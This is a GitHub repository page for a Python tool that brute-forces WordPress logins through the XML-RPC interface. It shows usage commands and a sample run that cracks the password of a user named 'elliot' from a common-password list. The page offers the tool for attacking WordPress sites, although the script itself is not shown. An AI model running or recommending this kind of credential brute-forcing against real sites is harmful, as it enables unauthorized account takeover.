Skip to content
An XMLRPC brute forcer targeting Wordpress written in Python 3. In the context of xmlrpc brute forcing, its faster than Hydra and WpScan. It can brute force 1000 passwords per second.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

An XMLRPC BruteForcer for Wordpress - Inpired by (1N3@CrowdShield)

Twitter - Telegram - Blog

Available in


python3 passwords.txt username
python3 passwords.txt userlist.txt ( >>in progess<<)


If you get an xml.etree.ElementTree.ParseError:

  • Did you forget to add 'xmlrpc' in the url ?
  • Try to add or remove 'https' or 'www'.


  • Exception Handling for xml.etree.ElementTree.ParseError
  • 'userlist' enumeration


MacBook-Pro: kavish$ python3 10k-most-common.txt elliot

---------------Examining Target--------------------

[>] Target is vulnerable.


--=[Tried: 1000 passwords]=--
--=[Tried: 2000 passwords]=--
--=[Tried: 3000 passwords]=--
--------------- BRUTEFORCE SUCCESSFULL  ---------------
--=[User found]=--
Login: elliot
Password: ER28-0652
You can’t perform that action at this time.